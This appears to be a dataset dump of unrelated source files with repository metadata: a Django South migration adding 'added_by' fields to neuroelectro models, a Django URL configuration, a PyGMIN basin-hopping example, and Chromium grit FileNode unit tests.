sdks/python/.tox/lint/lib/python2.7/site-packages/pylint/checkers/stdlib.py
|
Python
|
apache-2.0
| 10,428
|
[
"VisIt"
] |
b57c351640fc2c1f89813536cd2a1fe92354dd3752f47958283f962f93e4b3e0
|
# -*- coding: utf-8 -*-
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding field 'EphysConceptMap.added_by'
db.add_column('neuroelectro_ephysconceptmap', 'added_by',
self.gf('django.db.models.fields.related.ForeignKey')(to=orm['neuroelectro.User'], null=True),
keep_default=False)
# Adding field 'NeuronEphysDataMap.added_by'
db.add_column('neuroelectro_neuronephysdatamap', 'added_by',
self.gf('django.db.models.fields.related.ForeignKey')(to=orm['neuroelectro.User'], null=True),
keep_default=False)
# Adding field 'NeuronConceptMap.added_by'
db.add_column('neuroelectro_neuronconceptmap', 'added_by',
self.gf('django.db.models.fields.related.ForeignKey')(to=orm['neuroelectro.User'], null=True),
keep_default=False)
def backwards(self, orm):
# Deleting field 'EphysConceptMap.added_by'
db.delete_column('neuroelectro_ephysconceptmap', 'added_by_id')
# Deleting field 'NeuronEphysDataMap.added_by'
db.delete_column('neuroelectro_neuronephysdatamap', 'added_by_id')
# Deleting field 'NeuronConceptMap.added_by'
db.delete_column('neuroelectro_neuronconceptmap', 'added_by_id')
models = {
'auth.group': {
'Meta': {'object_name': 'Group'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
'auth.permission': {
'Meta': {'ordering': "('content_type__app_label', 'content_type__model', 'codename')", 'unique_together': "(('content_type', 'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
'auth.user': {
'Meta': {'object_name': 'User'},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Group']", 'symmetrical': 'False', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
},
'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
'neuroelectro.article': {
'Meta': {'object_name': 'Article'},
'abstract': ('django.db.models.fields.CharField', [], {'max_length': '10000', 'null': 'True'}),
'author_list_str': ('django.db.models.fields.CharField', [], {'max_length': '500', 'null': 'True'}),
'authors': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['neuroelectro.Author']", 'null': 'True', 'symmetrical': 'False'}),
'full_text_link': ('django.db.models.fields.CharField', [], {'max_length': '1000', 'null': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'journal': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['neuroelectro.Journal']", 'null': 'True'}),
'metadata': ('django.db.models.fields.related.ManyToManyField', [], {'default': 'None', 'to': "orm['neuroelectro.MetaData']", 'null': 'True', 'symmetrical': 'False'}),
'pmid': ('django.db.models.fields.IntegerField', [], {}),
'pub_year': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'substances': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['neuroelectro.Substance']", 'null': 'True', 'symmetrical': 'False'}),
'suggester': ('django.db.models.fields.related.ForeignKey', [], {'default': 'None', 'to': "orm['neuroelectro.User']", 'null': 'True'}),
'terms': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['neuroelectro.MeshTerm']", 'null': 'True', 'symmetrical': 'False'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '500'})
},
'neuroelectro.articlefulltext': {
'Meta': {'object_name': 'ArticleFullText'},
'article': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['neuroelectro.Article']"}),
'full_text': ('picklefield.fields.PickledObjectField', [], {'null': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'})
},
'neuroelectro.articlesummary': {
'Meta': {'object_name': 'ArticleSummary'},
'article': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['neuroelectro.Article']"}),
'data': ('django.db.models.fields.TextField', [], {'default': "''"}),
'date_mod': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'num_nedms': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'num_neurons': ('django.db.models.fields.IntegerField', [], {'null': 'True'})
},
'neuroelectro.author': {
'Meta': {'object_name': 'Author'},
'first': ('django.db.models.fields.CharField', [], {'max_length': '100', 'null': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'initials': ('django.db.models.fields.CharField', [], {'max_length': '10', 'null': 'True'}),
'last': ('django.db.models.fields.CharField', [], {'max_length': '100', 'null': 'True'}),
'middle': ('django.db.models.fields.CharField', [], {'max_length': '100', 'null': 'True'})
},
'neuroelectro.brainregion': {
'Meta': {'object_name': 'BrainRegion'},
'abbrev': ('django.db.models.fields.CharField', [], {'max_length': '10'}),
'allenid': ('django.db.models.fields.IntegerField', [], {'default': '0', 'null': 'True'}),
'color': ('django.db.models.fields.CharField', [], {'max_length': '10', 'null': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'isallen': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '500'}),
'treedepth': ('django.db.models.fields.IntegerField', [], {'null': 'True'})
},
'neuroelectro.datasource': {
'Meta': {'object_name': 'DataSource'},
'data_table': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['neuroelectro.DataTable']", 'null': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'user_submission': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['neuroelectro.UserSubmission']", 'null': 'True'}),
'user_upload': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['neuroelectro.UserUpload']", 'null': 'True'})
},
'neuroelectro.datatable': {
'Meta': {'object_name': 'DataTable'},
'article': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['neuroelectro.Article']"}),
'date_mod': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'link': ('django.db.models.fields.CharField', [], {'max_length': '1000'}),
'needs_expert': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'table_html': ('picklefield.fields.PickledObjectField', [], {'null': 'True'}),
'table_text': ('django.db.models.fields.CharField', [], {'max_length': '10000', 'null': 'True'})
},
'neuroelectro.ephysconceptmap': {
'Meta': {'object_name': 'EphysConceptMap'},
'added_by': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['neuroelectro.User']", 'null': 'True'}),
'date_mod': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'dt_id': ('django.db.models.fields.CharField', [], {'max_length': '20', 'null': 'True'}),
'ephys_prop': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['neuroelectro.EphysProp']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'match_quality': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'ref_text': ('django.db.models.fields.CharField', [], {'max_length': '200'}),
'source': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['neuroelectro.DataSource']"}),
'times_validated': ('django.db.models.fields.IntegerField', [], {'default': '0'})
},
'neuroelectro.ephysprop': {
'Meta': {'object_name': 'EphysProp'},
'definition': ('django.db.models.fields.CharField', [], {'max_length': '1000', 'null': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '200'}),
'synonyms': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['neuroelectro.EphysPropSyn']", 'symmetrical': 'False'}),
'units': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['neuroelectro.Unit']", 'null': 'True'})
},
'neuroelectro.ephyspropsummary': {
'Meta': {'object_name': 'EphysPropSummary'},
'data': ('django.db.models.fields.TextField', [], {'default': "''"}),
'date_mod': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'ephys_prop': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['neuroelectro.EphysProp']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'num_articles': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'num_nedms': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'num_neurons': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'value_mean_articles': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'value_mean_neurons': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'value_sd_articles': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'value_sd_neurons': ('django.db.models.fields.FloatField', [], {'null': 'True'})
},
'neuroelectro.ephyspropsyn': {
'Meta': {'object_name': 'EphysPropSyn'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'term': ('django.db.models.fields.CharField', [], {'max_length': '200'})
},
'neuroelectro.insituexpt': {
'Meta': {'object_name': 'InSituExpt'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'imageseriesid': ('django.db.models.fields.IntegerField', [], {}),
'plane': ('django.db.models.fields.CharField', [], {'max_length': '20'}),
'regionexprs': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['neuroelectro.RegionExpr']", 'null': 'True', 'symmetrical': 'False'}),
'valid': ('django.db.models.fields.BooleanField', [], {'default': 'True'})
},
'neuroelectro.institution': {
'Meta': {'object_name': 'Institution'},
'country': ('django.db.models.fields.CharField', [], {'max_length': '50', 'null': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '200'}),
'state': ('django.db.models.fields.CharField', [], {'max_length': '2', 'null': 'True'}),
'type': ('django.db.models.fields.CharField', [], {'max_length': '50', 'null': 'True'})
},
'neuroelectro.journal': {
'Meta': {'object_name': 'Journal'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'short_title': ('django.db.models.fields.CharField', [], {'max_length': '100', 'null': 'True'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '300'})
},
'neuroelectro.meshterm': {
'Meta': {'object_name': 'MeshTerm'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'term': ('django.db.models.fields.CharField', [], {'max_length': '300'})
},
'neuroelectro.metadata': {
'Meta': {'object_name': 'MetaData'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'}),
'value': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
'neuroelectro.neuron': {
'Meta': {'object_name': 'Neuron'},
'added_by': ('django.db.models.fields.CharField', [], {'max_length': '20', 'null': 'True'}),
'date_mod': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'null': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '500'}),
'nlex_id': ('django.db.models.fields.CharField', [], {'max_length': '100', 'null': 'True'}),
'regions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['neuroelectro.BrainRegion']", 'null': 'True', 'symmetrical': 'False'}),
'synonyms': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['neuroelectro.NeuronSyn']", 'null': 'True', 'symmetrical': 'False'})
},
'neuroelectro.neuronarticlemap': {
'Meta': {'object_name': 'NeuronArticleMap'},
'added_by': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['neuroelectro.User']", 'null': 'True'}),
'article': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['neuroelectro.Article']", 'null': 'True'}),
'date_mod': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'neuron': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['neuroelectro.Neuron']"}),
'num_mentions': ('django.db.models.fields.IntegerField', [], {'null': 'True'})
},
'neuroelectro.neuronconceptmap': {
'Meta': {'object_name': 'NeuronConceptMap'},
'added_by': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['neuroelectro.User']", 'null': 'True'}),
'date_mod': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'dt_id': ('django.db.models.fields.CharField', [], {'max_length': '20', 'null': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'match_quality': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'neuron': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['neuroelectro.Neuron']"}),
'ref_text': ('django.db.models.fields.CharField', [], {'max_length': '200'}),
'source': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['neuroelectro.DataSource']"}),
'times_validated': ('django.db.models.fields.IntegerField', [], {'default': '0'})
},
'neuroelectro.neuronephysdatamap': {
'Meta': {'object_name': 'NeuronEphysDataMap'},
'added_by': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['neuroelectro.User']", 'null': 'True'}),
'date_mod': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'dt_id': ('django.db.models.fields.CharField', [], {'max_length': '20', 'null': 'True'}),
'ephys_concept_map': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['neuroelectro.EphysConceptMap']"}),
'err': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'match_quality': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'metadata': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['neuroelectro.MetaData']", 'symmetrical': 'False'}),
'n': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'neuron_concept_map': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['neuroelectro.NeuronConceptMap']"}),
'ref_text': ('django.db.models.fields.CharField', [], {'max_length': '200'}),
'source': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['neuroelectro.DataSource']"}),
'times_validated': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'val': ('django.db.models.fields.FloatField', [], {}),
'val_norm': ('django.db.models.fields.FloatField', [], {'null': 'True'})
},
'neuroelectro.neuronephyssummary': {
'Meta': {'object_name': 'NeuronEphysSummary'},
'data': ('django.db.models.fields.TextField', [], {'default': "''"}),
'date_mod': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'ephys_prop': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['neuroelectro.EphysProp']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'neuron': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['neuroelectro.Neuron']"}),
'num_articles': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'num_nedms': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'value_mean': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'value_sd': ('django.db.models.fields.FloatField', [], {'null': 'True'})
},
'neuroelectro.neuronsummary': {
'Meta': {'object_name': 'NeuronSummary'},
'cluster_xval': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'cluster_yval': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'data': ('django.db.models.fields.TextField', [], {'default': "''"}),
'date_mod': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'neuron': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['neuroelectro.Neuron']"}),
'num_articles': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'num_ephysprops': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'num_nedms': ('django.db.models.fields.IntegerField', [], {'null': 'True'})
},
'neuroelectro.neuronsyn': {
'Meta': {'object_name': 'NeuronSyn'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'term': ('django.db.models.fields.CharField', [], {'max_length': '500'})
},
'neuroelectro.protein': {
'Meta': {'object_name': 'Protein'},
'allenid': ('django.db.models.fields.IntegerField', [], {}),
'common_name': ('django.db.models.fields.CharField', [], {'max_length': '400', 'null': 'True'}),
'entrezid': ('django.db.models.fields.IntegerField', [], {}),
'gene': ('django.db.models.fields.CharField', [], {'max_length': '20'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'in_situ_expts': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['neuroelectro.InSituExpt']", 'null': 'True', 'symmetrical': 'False'}),
'is_channel': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '400'}),
'synonyms': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['neuroelectro.ProteinSyn']", 'null': 'True', 'symmetrical': 'False'})
},
'neuroelectro.proteinsyn': {
'Meta': {'object_name': 'ProteinSyn'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'term': ('django.db.models.fields.CharField', [], {'max_length': '500'})
},
'neuroelectro.regionexpr': {
'Meta': {'object_name': 'RegionExpr'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'region': ('django.db.models.fields.related.ForeignKey', [], {'default': '0', 'to': "orm['neuroelectro.BrainRegion']"}),
'val': ('django.db.models.fields.FloatField', [], {})
},
'neuroelectro.species': {
'Meta': {'object_name': 'Species'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '500'})
},
'neuroelectro.substance': {
'Meta': {'object_name': 'Substance'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'term': ('django.db.models.fields.CharField', [], {'max_length': '300'})
},
'neuroelectro.unit': {
'Meta': {'object_name': 'Unit'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '20'}),
'prefix': ('django.db.models.fields.CharField', [], {'max_length': '1'})
},
'neuroelectro.user': {
'Meta': {'object_name': 'User', '_ormbases': ['auth.User']},
'assigned_neurons': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['neuroelectro.Neuron']", 'null': 'True', 'symmetrical': 'False'}),
'institution': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['neuroelectro.Institution']", 'null': 'True'}),
'is_curator': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'lab_head': ('django.db.models.fields.CharField', [], {'max_length': '50', 'null': 'True'}),
'lab_website_url': ('django.db.models.fields.CharField', [], {'max_length': '200', 'null': 'True'}),
'last_update': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'null': 'True', 'blank': 'True'}),
'user_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['auth.User']", 'unique': 'True', 'primary_key': 'True'})
},
'neuroelectro.usersubmission': {
'Meta': {'object_name': 'UserSubmission'},
'data': ('picklefield.fields.PickledObjectField', [], {'null': 'True'}),
'date_mod': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['neuroelectro.User']"})
},
'neuroelectro.userupload': {
'Meta': {'object_name': 'UserUpload'},
'data': ('picklefield.fields.PickledObjectField', [], {'null': 'True'}),
'date_mod': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'path': ('django.db.models.fields.FilePathField', [], {'max_length': '100'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['neuroelectro.User']"})
}
}
complete_apps = ['neuroelectro']
|
neuroelectro/neuroelectro_org
|
neuroelectro/south_migrations/0048_auto__add_field_ephysconceptmap_added_by__add_field_neuronephysdatamap.py
|
Python
|
gpl-2.0
| 26,623
|
[
"NEURON"
] |
0703d5c88f155afa826798ebc8aff7854af353b721593b31d2bbf5170722460d
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.conf import settings
from django.conf.urls import include, url
from django.conf.urls.static import static
from django.contrib import admin
from django.views import defaults as default_views
from imagery.impart import views
urlpatterns = [
url(settings.ADMIN_URL, admin.site.urls),
url(r"^$", views.index, name="home"),
url(r"^artist/(?P<artist_id>[0-9]+)/", views.artist, name="artist"),
url(r"^archive/", views.archive, name="archive"),
] + static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)
if settings.DEBUG:
# This allows the error pages to be debugged during development, just visit
# these url in browser to see how these error pages look like.
# TODO: style these!
urlpatterns += [
url(
r"^400/$",
default_views.bad_request,
kwargs={"exception": Exception("Bad Request!")},
),
url(
r"^403/$",
default_views.permission_denied,
kwargs={"exception": Exception("Permission Denied")},
),
url(
r"^404/$",
default_views.page_not_found,
kwargs={"exception": Exception("Page not Found")},
),
url(r"^500/$", default_views.server_error),
]
if "debug_toolbar" in settings.INSTALLED_APPS:
import debug_toolbar
urlpatterns += [url(r"^__debug__/", include(debug_toolbar.urls))]
|
jw/imagery
|
config/urls.py
|
Python
|
mit
| 1,482
|
[
"VisIt"
] |
b3bd916bba044ec852b1964a59031d52c1ba06572b0c986ceb90d0dc6ee1645e
|
# -*- coding: iso-8859-1 -*-
############################################################
#Example 5: Adding a custom takestep routine. This example
#takes 100 monte carlo steps as one basin hopping step
############################################################
import numpy as np
import pygmin.potentials.lj as lj
import pygmin.basinhopping as bh
from pygmin.takestep import displace
from pygmin.mc import MonteCarlo
class TakeStepMonteCarlo:
def __init__(self, pot, T = 10., nsteps = 100, stepsize=0.1):
self.potential = pot
self.T = T
self.nsteps = nsteps
self.mcstep = displace.RandomDisplacement(stepsize=stepsize)
def takeStep(self, coords, **kwargs):
#make a new monte carlo class
mc = MonteCarlo(coords, self.potential, self.mcstep,
temperature = self.T, outstream=None)
mc.run( self.nsteps )
coords[:] = mc.coords[:]
def updateStep(self, acc, **kwargs):
pass
natoms = 12
# random initial coordinates
coords=np.random.random(3*natoms)
potential = lj.LJ()
step = TakeStepMonteCarlo(potential)
opt = bh.BasinHopping(coords, potential, takeStep=step)
opt.run(100)
# some visualization
try:
import pygmin.utils.pymolwrapper as pym
pym.start()
pym.draw_spheres(opt.coords, "A", 1)
except:
print "Could not draw using pymol, skipping this step"
|
js850/PyGMIN
|
examples/basinhopping_no_system_class/5_custom_takestep.py
|
Python
|
gpl-3.0
| 1,412
|
[
"PyMOL"
] |
870d7843116057e632a02fad70c21dd358945f5d7699ca7ebb6b9d3fedc8f1fe
|
#!/usr/bin/env python3
# Copyright (c) 2012 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
'''Unit tests for node_io.FileNode'''
from __future__ import print_function
import os
import sys
import unittest
if __name__ == '__main__':
sys.path.append(os.path.join(os.path.dirname(__file__), '../..'))
from six import StringIO
from grit.node import misc
from grit.node import node_io
from grit.node import empty
from grit import grd_reader
from grit import util
def _GetAllCliques(root_node):
"""Return all cliques in the |root_node| tree."""
ret = []
for node in root_node:
ret.extend(node.GetCliques())
return ret
class FileNodeUnittest(unittest.TestCase):
def testGetPath(self):
root = misc.GritNode()
root.StartParsing(u'grit', None)
root.HandleAttribute(u'latest_public_release', u'0')
root.HandleAttribute(u'current_release', u'1')
root.HandleAttribute(u'base_dir', r'..\resource')
translations = empty.TranslationsNode()
translations.StartParsing(u'translations', root)
root.AddChild(translations)
file_node = node_io.FileNode()
file_node.StartParsing(u'file', translations)
file_node.HandleAttribute(u'path', r'flugel\kugel.pdf')
translations.AddChild(file_node)
root.EndParsing()
self.failUnless(root.ToRealPath(file_node.GetInputPath()) ==
util.normpath(
os.path.join(r'../resource', r'flugel/kugel.pdf')))
def VerifyCliquesContainEnglishAndFrenchAndNothingElse(self, cliques):
self.assertEqual(2, len(cliques))
for clique in cliques:
self.assertEqual({'en', 'fr'}, set(clique.clique.keys()))
def testLoadTranslations(self):
xml = '''<?xml version="1.0" encoding="UTF-8"?>
<grit latest_public_release="2" source_lang_id="en-US" current_release="3" base_dir=".">
<translations>
<file path="generated_resources_fr.xtb" lang="fr" />
</translations>
<release seq="3">
<messages>
<message name="ID_HELLO">Hello!</message>
<message name="ID_HELLO_USER">Hello <ph name="USERNAME">%s<ex>Joi</ex></ph></message>
</messages>
</release>
</grit>'''
grd = grd_reader.Parse(StringIO(xml),
util.PathFromRoot('grit/testdata'))
grd.SetOutputLanguage('en')
grd.RunGatherers()
self.VerifyCliquesContainEnglishAndFrenchAndNothingElse(_GetAllCliques(grd))
def testIffyness(self):
grd = grd_reader.Parse(StringIO('''<?xml version="1.0" encoding="UTF-8"?>
<grit latest_public_release="2" source_lang_id="en-US" current_release="3" base_dir=".">
<translations>
<if expr="lang == 'fr'">
<file path="generated_resources_fr.xtb" lang="fr" />
</if>
</translations>
<release seq="3">
<messages>
<message name="ID_HELLO">Hello!</message>
<message name="ID_HELLO_USER">Hello <ph name="USERNAME">%s<ex>Joi</ex></ph></message>
</messages>
</release>
</grit>'''), util.PathFromRoot('grit/testdata'))
grd.SetOutputLanguage('en')
grd.RunGatherers()
cliques = _GetAllCliques(grd)
self.assertEqual(2, len(cliques))
for clique in cliques:
self.assertEqual({'en'}, set(clique.clique.keys()))
grd.SetOutputLanguage('fr')
grd.RunGatherers()
self.VerifyCliquesContainEnglishAndFrenchAndNothingElse(_GetAllCliques(grd))
def testConditionalLoadTranslations(self):
xml = '''<?xml version="1.0" encoding="UTF-8"?>
<grit latest_public_release="2" source_lang_id="en-US" current_release="3"
base_dir=".">
<translations>
<if expr="True">
<file path="generated_resources_fr.xtb" lang="fr" />
</if>
<if expr="False">
<file path="no_such_file.xtb" lang="de" />
</if>
</translations>
<release seq="3">
<messages>
<message name="ID_HELLO">Hello!</message>
<message name="ID_HELLO_USER">Hello <ph name="USERNAME">%s<ex>
Joi</ex></ph></message>
</messages>
</release>
</grit>'''
grd = grd_reader.Parse(StringIO(xml),
util.PathFromRoot('grit/testdata'))
grd.SetOutputLanguage('en')
grd.RunGatherers()
self.VerifyCliquesContainEnglishAndFrenchAndNothingElse(_GetAllCliques(grd))
def testConditionalOutput(self):
xml = '''<?xml version="1.0" encoding="UTF-8"?>
<grit latest_public_release="2" source_lang_id="en-US" current_release="3"
base_dir=".">
<outputs>
<output filename="resource.h" type="rc_header" />
<output filename="en/generated_resources.rc" type="rc_all"
lang="en" />
<if expr="pp_if('NOT_TRUE')">
<output filename="de/generated_resources.rc" type="rc_all"
lang="de" />
</if>
</outputs>
<release seq="3">
<messages>
<message name="ID_HELLO">Hello!</message>
</messages>
</release>
</grit>'''
grd = grd_reader.Parse(StringIO(xml),
util.PathFromRoot('grit/test/data'),
defines={})
grd.SetOutputLanguage('en')
grd.RunGatherers()
outputs = grd.GetChildrenOfType(node_io.OutputNode)
active = set(grd.ActiveDescendants())
self.failUnless(outputs[0] in active)
self.failUnless(outputs[0].GetType() == 'rc_header')
self.failUnless(outputs[1] in active)
self.failUnless(outputs[1].GetType() == 'rc_all')
self.failUnless(outputs[2] not in active)
self.failUnless(outputs[2].GetType() == 'rc_all')
# Verify that 'iw' and 'no' language codes in xtb files are mapped to 'he' and
# 'nb'.
def testLangCodeMapping(self):
grd = grd_reader.Parse(StringIO('''<?xml version="1.0" encoding="UTF-8"?>
<grit latest_public_release="2" source_lang_id="en-US" current_release="3" base_dir=".">
<translations>
<file path="generated_resources_no.xtb" lang="nb" />
<file path="generated_resources_iw.xtb" lang="he" />
</translations>
<release seq="3">
<messages></messages>
</release>
</grit>'''), util.PathFromRoot('grit/testdata'))
grd.SetOutputLanguage('en')
grd.RunGatherers()
self.assertEqual([], _GetAllCliques(grd))
if __name__ == '__main__':
unittest.main()
|
chromium/chromium
|
